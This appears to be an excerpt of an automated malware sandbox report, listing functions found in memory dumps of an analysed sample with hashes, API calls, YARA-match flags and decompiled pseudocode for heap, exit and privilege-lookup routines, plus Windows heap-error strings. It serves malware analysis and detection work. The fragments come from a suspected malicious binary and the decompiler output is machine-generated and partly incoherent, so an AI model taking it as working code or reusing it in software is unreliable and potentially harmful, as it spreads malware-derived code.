                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 8243a60ce5f21c318fdf8cc5dd340aae020f77aee6376e54ead2db8be5fc33ce
                          • Instruction ID: dd7c23fd0dee7fd67c33e8e4a1b251b386cac9f5ec6dd80891fc26a8f500fe13
                          • Opcode Fuzzy Hash: 8243a60ce5f21c318fdf8cc5dd340aae020f77aee6376e54ead2db8be5fc33ce
                          • Instruction Fuzzy Hash: BC9002A122200503410571998414616410EA7E0242B91C021E1404590DC56588A17265
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01029710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 087670dffa616551ac3156bb03d226aae24c4dc06af3db0ee46dc84b20bf4092
                          • Instruction ID: 33ec6b234fbe1335bb6dee9a784c9534ad38a7603769ba20ecf1be3e2738427d
                          • Opcode Fuzzy Hash: 087670dffa616551ac3156bb03d226aae24c4dc06af3db0ee46dc84b20bf4092
                          • Instruction Fuzzy Hash: 9A90027122100902D10065D994086460109A7E0342F91D011A5414555EC6A588A17271
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01029780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: b6721049343137d0675d399fa3985eb7d03fa8a1147dcfcf0e4b52f03562ae6c
                          • Instruction ID: 60cca144ea13a1c44bf713ae0616f1ca0481dbd98e999abc1decca50abe212cf
                          • Opcode Fuzzy Hash: b6721049343137d0675d399fa3985eb7d03fa8a1147dcfcf0e4b52f03562ae6c
                          • Instruction Fuzzy Hash: 7690026923300502D1807199940860A0109A7D1243FD1D415A0405558CC95588796361
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 010297A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: f5ff5288345a3e53167c9d194835a6d415377ee9e373265a02be775d43cc5b44
                          • Instruction ID: ada6d38c25df5381def28ef2eac5358349ae29dd26a4a19b1704bd73940ff84d
                          • Opcode Fuzzy Hash: f5ff5288345a3e53167c9d194835a6d415377ee9e373265a02be775d43cc5b44
                          • Instruction Fuzzy Hash: B290026132100503D140719994186064109F7E1342F91D011E0804554CD95588666362
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01029FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: ef4fa326c516f3b80166cd6d9b7a62e8e731fe8440ef43f42ce29dbf4dfe57f2
                          • Instruction ID: e25ecb83a1500eccf144bfd0bc48860dd863ee1d7ff29b980610c4b52bfde9f1
                          • Opcode Fuzzy Hash: ef4fa326c516f3b80166cd6d9b7a62e8e731fe8440ef43f42ce29dbf4dfe57f2
                          • Instruction Fuzzy Hash: 3690027133114902D1106199C4047060109A7D1242F91C411A0C14558DC6D588A17262
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01029660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 4738726ee3adfb8b8d2ec23e9fb1084c64dd63829e5e5c398396409820a75653
                          • Instruction ID: 40df6e560410b834ef39bcc67f3213546e1b37eec6f129d181373a5b9c87354c
                          • Opcode Fuzzy Hash: 4738726ee3adfb8b8d2ec23e9fb1084c64dd63829e5e5c398396409820a75653
                          • Instruction Fuzzy Hash: 2690027122100D02D1807199840464A0109A7D1342FD1C015A0415654DCA558A6977E1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 010296E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 0b0c6a0887f45c719044b80fa28f75c63cb4f272fa0acb84fe3fc67f9672bb73
                          • Instruction ID: fcf73888d072860bb51d07e3df836e37d8bf1f9d8d878cc2e1b118a7a1a7090e
                          • Opcode Fuzzy Hash: 0b0c6a0887f45c719044b80fa28f75c63cb4f272fa0acb84fe3fc67f9672bb73
                          • Instruction Fuzzy Hash: AB90027122108D02D1106199C40474A0109A7D0342F95C411A4814658DC6D588A17261
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004088D0, Relevance: .1, Instructions: 92COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
                          • Instruction ID: a66f789b9c9346c4209e30225a072a2b07741faaa143dbde407d40e20ce1c0b9
                          • Opcode Fuzzy Hash: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
                          • Instruction Fuzzy Hash: BD21FBB2C4420957CB15E6649E42BFF737C9B54304F04057FE989A3181F639AB4987A7
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004188B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E004188B0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E004191E0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413536
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}





                          0x004188c7
                          0x004188d2
                          0x004188dd
                          0x004188e1

                          APIs
                          • RtlAllocateHeap.NTDLL(65A,?,00413CAF,00413CAF,?,00413536,?,?,?,?,?,00000000,00408B13,?), ref: 004188DD
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: AllocateHeap
                          • String ID: 65A
                          • API String ID: 1279760036-2085483392
                          • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                          • Instruction ID: 6af236cfb772a66706e6e9b9d52e602bd21d3a4cd2a65313634d6b12f98b32f7
                          • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                          • Instruction Fuzzy Hash: BDE012B1200208ABDB14EF99CC45EA777ACAF88654F118559FA085B242CA30F910CAB0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00418923, Relevance: 3.0, APIs: 2, Instructions: 50memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 40%
                          			E00418923(void* __ebx, void* __ecx, int __edx, void* __eflags) {
				void* __esi;
				void* __ebp;
				intOrPtr* _t10;
				char _t13;
				void* _t14;
				void* _t15;
				int _t17;
				void* _t20;
				void* _t23;

				_t17 = __edx;
				_t15 = __ecx;
				_t14 = __ebx;
				_pop(_t10);
				if(__eflags > 0) {
					L5:
					_t8 = _t14 + 0x68b0c55;
					 *_t8 =  *((intOrPtr*)(_t14 + 0x68b0c55)) + _t15;
					__eflags =  *_t8;
					ExitProcess(_t17);
				}
				__edx = __edx + 1;
				__eflags = __edx;
				_t4 = __ax;
				__ax = __cx;
				__cx = _t4;
				if(__edx <= 0) {
					_pop(ss);
					_push(0x6d);
					asm("loope 0xffffffc3");
					__ebp = __esp;
					__eax =  *((intOrPtr*)(__esp + 8));
					__ecx =  *((intOrPtr*)(__eax + 0xa14));
					__esi = __eax + 0xc7c;
					__eax = E004191E0(__edi, __eax, __eax + 0xc7c,  *((intOrPtr*)(__eax + 0xa14)), 0, 0x36);
					goto L5;
				}
				 *_t10 =  *_t10 + _t10;
				_push(_t10);
				E004191E0(_t20);
				_t13 = RtlFreeHeap( *(_t23 + 0xc),  *(_t23 + 0x10),  *(_t23 + 0x14)); // executed
				return _t13;
			}












                          0x00418923
                          0x00418923
                          0x00418923
                          0x00418923
                          0x00418924
                          0x0041894e
                          0x0041894e
                          0x0041894e
                          0x0041894e
                          0x00418958
                          0x00418958
                          0x00418926
                          0x00418926
                          0x00418927
                          0x00418927
                          0x00418927
                          0x00418929
                          0x0041892b
                          0x0041892c
                          0x0041892e
                          0x00418931
                          0x00418933
                          0x00418936
                          0x00418942
                          0x0041894a
                          0x00000000
                          0x0041894a
                          0x00418903
                          0x00418906
                          0x00418907
                          0x0041891d
                          0x00418921

                          APIs
                          • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418958
                          Memory Dump Source
                          • Source File: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: ExitFreeHeapProcess
                          • String ID:
                          • API String ID: 1180424539-0
                          • Opcode ID: f4c07f08e70274fe5969a5ba238bd53d72c6937873ebf5ecc56d9da218e84072
                          • Instruction ID: 2ca7b805f7778705d74f9d09f1563c9da4ba412d0acfcda959870e8aed924cc8
                          • Opcode Fuzzy Hash: f4c07f08e70274fe5969a5ba238bd53d72c6937873ebf5ecc56d9da218e84072
                          • Instruction Fuzzy Hash: 7601B1B52043057BD721DF58DC96FE77758EF84760F04409AF9485B242D930EE50CAE5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004188E2, Relevance: 3.0, APIs: 2, Instructions: 35memoryCOMMON
                          Download Yara Rule
                          APIs
                          • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418958
                          Memory Dump Source
                          • Source File: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: ExitFreeHeapProcess
                          • String ID:
                          • API String ID: 1180424539-0
                          • Opcode ID: b15be104c320dfa4f44ef67500cef52cc1af5f29270f7141fdfe4c962698c0c7
                          • Instruction ID: 5bd50c8c3eb33e5b96021e555d33704aa5d1df429cc087b465dd648f0bfa85b0
                          • Opcode Fuzzy Hash: b15be104c320dfa4f44ef67500cef52cc1af5f29270f7141fdfe4c962698c0c7
                          • Instruction Fuzzy Hash: 87F0E2B52002147BCB15DF58CC49EE7379CEF48740F154599F9086B242C630E940CAF1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00407280, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                          Download Yara Rule
                          APIs
                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                          Memory Dump Source
                          • Source File: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: MessagePostThread
                          • String ID:
                          • API String ID: 1836367815-0
                          • Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                          • Instruction ID: 93bd109d16e53c8762968f959fe3c9c023db94cb098c15d1529cbaaabdda2f39
                          • Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                          • Instruction Fuzzy Hash: F001D431A8022977E720AA959C03FFE772C5B00B55F04006EFF04BA1C2E6A8790542EA
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00418A43, Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                          Download Yara Rule
                          APIs
                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80
                          Memory Dump Source
                          • Source File: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: LookupPrivilegeValue
                          • String ID:
                          • API String ID: 3899507212-0
                          • Opcode ID: 0a07abca213fd1898abc626acc5bd91f107e72fdd67c15d3a60637870484657c
                          • Instruction ID: a1270247ef26ae8ef761aa800b0d1d2d5b176ed9c01364dbca8af8c15f65e25b
                          • Opcode Fuzzy Hash: 0a07abca213fd1898abc626acc5bd91f107e72fdd67c15d3a60637870484657c
                          • Instruction Fuzzy Hash: 85E0E5752142906FCB11CB69DC45E973FA8DF45240F044599FD8857203C4349414C7B4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004188F0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                          Download Yara Rule
                          APIs
                          • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                          Memory Dump Source
                          • Source File: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: FreeHeap
                          • String ID:
                          • API String ID: 3298025750-0
                          • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                          • Instruction ID: 4eb6e808868848e44fc4af0a2d328e43ee2ba6839a30e24a5e1d9ea2c08b961d
                          • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                          • Instruction Fuzzy Hash: 6BE012B1200209ABDB18EF99CC49EA777ACAF88750F018559FA085B242CA30E910CAB0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00418A50, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                          Download Yara Rule
                          APIs
                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80
                          Memory Dump Source
                          • Source File: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: LookupPrivilegeValue
                          • String ID:
                          • API String ID: 3899507212-0
                          • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                          • Instruction ID: 6b795ac81b365ad13cf9f2a9b204a9737006b755962b409e964d21a2d06fa60d
                          • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                          • Instruction Fuzzy Hash: 62E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FA0857241C934E950CBF5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00418930, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                          Download Yara Rule
                          APIs
                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418958
                          Memory Dump Source
                          • Source File: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID:
                          • API String ID: 621844428-0
                          • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                          • Instruction ID: c6ffa8f41277cedcd146721b33de4ab2dd662f0a832426917f21051448e796de
                          • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                          • Instruction Fuzzy Hash: 90D012716042147BD620DB99CC85FD7779CDF48790F018065FA1C5B241C531BA00C6E1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0102967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: aa504302374b86394f956a64c2b3b2bf601dcd67b5ab9d96385e61bba8b2cf4b
                          • Instruction ID: 243ba033f1fa935ed16f2785cc48698f715f6da06f3a2df43106aa4054c7ab8c
                          • Opcode Fuzzy Hash: aa504302374b86394f956a64c2b3b2bf601dcd67b5ab9d96385e61bba8b2cf4b
                          • Instruction Fuzzy Hash: 9BB09B719114D5C9D651D7A4460C7177A4477D4745F56C061D1420641B4778C095F6B5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          Function 0109B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                          Download Yara Rule
                          Strings
                          • an invalid address, %p, xrefs: 0109B4CF
                          • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0109B47D
                          • read from, xrefs: 0109B4AD, 0109B4B2
                          • This failed because of error %Ix., xrefs: 0109B446
                          • *** An Access Violation occurred in %ws:%s, xrefs: 0109B48F
                          • *** then kb to get the faulting stack, xrefs: 0109B51C
                          • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0109B2DC
                          • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0109B39B
                          • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0109B476
                          • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0109B314
                          • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0109B305
                          • *** Inpage error in %ws:%s, xrefs: 0109B418
                          • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0109B38F
                          • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0109B3D6
                          • a NULL pointer, xrefs: 0109B4E0
                          • *** enter .exr %p for the exception record, xrefs: 0109B4F1
                          • <unknown>, xrefs: 0109B27E, 0109B2D1, 0109B350, 0109B399, 0109B417, 0109B48E
                          • The instruction at %p referenced memory at %p., xrefs: 0109B432
                          • The instruction at %p tried to %s , xrefs: 0109B4B6
                          • *** enter .cxr %p for the context, xrefs: 0109B50D
                          • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0109B2F3
                          • write to, xrefs: 0109B4A6
                          • The resource is owned exclusively by thread %p, xrefs: 0109B374
                          • *** Resource timeout (%p) in %ws:%s, xrefs: 0109B352
                          • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0109B323
                          • The resource is owned shared by %d threads, xrefs: 0109B37E
                          • The critical section is owned by thread %p., xrefs: 0109B3B9
                          • Go determine why that thread has not released the critical section., xrefs: 0109B3C5
                          • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0109B53F
                          • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0109B484
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                          • API String ID: 0-108210295
                          • Opcode ID: e4ae9e31c929a91e41132296ce40512f22bf8ab588279936a5b1937070ee35f8
                          • Instruction ID: 456981eda588d109beb15d67dbb1126519e2c845e8440bd8a6eff6dae8def42e
                          • Opcode Fuzzy Hash: e4ae9e31c929a91e41132296ce40512f22bf8ab588279936a5b1937070ee35f8
                          • Instruction Fuzzy Hash: 40810375A40200FFDF21AB09AC95EAF3B76FF56B62F498085F5841B252D761C401FAB2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 010A1C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                          Download Yara Rule
                          C-Code - Quality: 44%
                          			E010A1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0xfc48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00FEB150();
				} else {
					E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x10d589c);
				E00FEB150("Heap error detected at %p (heap handle %p)\n",  *0x10d58a0);
				_t27 =  *0x10d5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M010A1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00FEB150();
				} else {
					E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E00FEB150("Error code: %d - %s\n",  *0x10d5898);
				_t113 =  *0x10d58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00FEB150();
					} else {
						E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00FEB150("Parameter1: %p\n",  *0x10d58a4);
				}
				_t115 =  *0x10d58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00FEB150();
					} else {
						E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00FEB150("Parameter2: %p\n",  *0x10d58a8);
				}
				_t117 =  *0x10d58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00FEB150();
					} else {
						E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00FEB150("Parameter3: %p\n",  *0x10d58ac);
				}
				_t119 =  *0x10d58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00FEB150();
					} else {
						E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x10d58b4);
					E00FEB150("Last known valid blocks: before - %p, after - %p\n",  *0x10d58b0);
				} else {
					_t120 =  *0x10d58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00FEB150();
				} else {
					E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E00FEB150("Stack trace available at %p\n", 0x10d58c0);
			}











                          0x010a1c10
                          0x010a1c16
                          0x010a1c1e
                          0x010a1c3d
                          0x010a1c3e
                          0x010a1c20
                          0x010a1c35
                          0x010a1c3a
                          0x010a1c44
                          0x010a1c55
                          0x010a1c5a
                          0x010a1c65
                          0x010a1c67
                          0x00000000
                          0x010a1c6e
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x010a1c67
                          0x010a1cdc
                          0x010a1ce5
                          0x010a1d04
                          0x010a1d05
                          0x010a1ce7
                          0x010a1cfc
                          0x010a1d01
                          0x010a1d0b
                          0x010a1d17
                          0x010a1d1f
                          0x010a1d25
                          0x010a1d30
                          0x010a1d4f
                          0x010a1d50
                          0x010a1d32
                          0x010a1d47
                          0x010a1d4c
                          0x010a1d61
                          0x010a1d67
                          0x010a1d68
                          0x010a1d6e
                          0x010a1d79
                          0x010a1d98
                          0x010a1d99
                          0x010a1d7b
                          0x010a1d90
                          0x010a1d95
                          0x010a1daa
                          0x010a1db0
                          0x010a1db1
                          0x010a1db7
                          0x010a1dc2
                          0x010a1de1
                          0x010a1de2
                          0x010a1dc4
                          0x010a1dd9
                          0x010a1dde
                          0x010a1df3
                          0x010a1df9
                          0x010a1dfa
                          0x010a1e00
                          0x010a1e0a
                          0x010a1e13
                          0x010a1e32
                          0x010a1e33
                          0x010a1e15
                          0x010a1e2a
                          0x010a1e2f
                          0x010a1e39
                          0x010a1e4a
                          0x010a1e02
                          0x010a1e02
                          0x010a1e08
                          0x00000000
                          0x00000000
                          0x010a1e08
                          0x010a1e5b
                          0x010a1e7a
                          0x010a1e7b
                          0x010a1e5d
                          0x010a1e72
                          0x010a1e77
                          0x010a1e95

                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                          • API String ID: 0-2897834094
                          • Opcode ID: 7f62e3a7677f3e2dff62f09ea9661ac2898729fa00aa556d9cb78ef55597d745
                          • Instruction ID: 386d647f9bf340cc0f79b20e3492c45b47a87ffbd384c7b80e8ec8992e690b61
                          • Opcode Fuzzy Hash: 7f62e3a7677f3e2dff62f09ea9661ac2898729fa00aa556d9cb78ef55597d745
                          • Instruction Fuzzy Hash: 3661B03651A185DFD311BBC9E896E2573A5EB04B70F4D807FF949AF352C63C9840AB0A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00FF3D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                          Download Yara Rule
                          C-Code - Quality: 96%
                          			E00FF3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
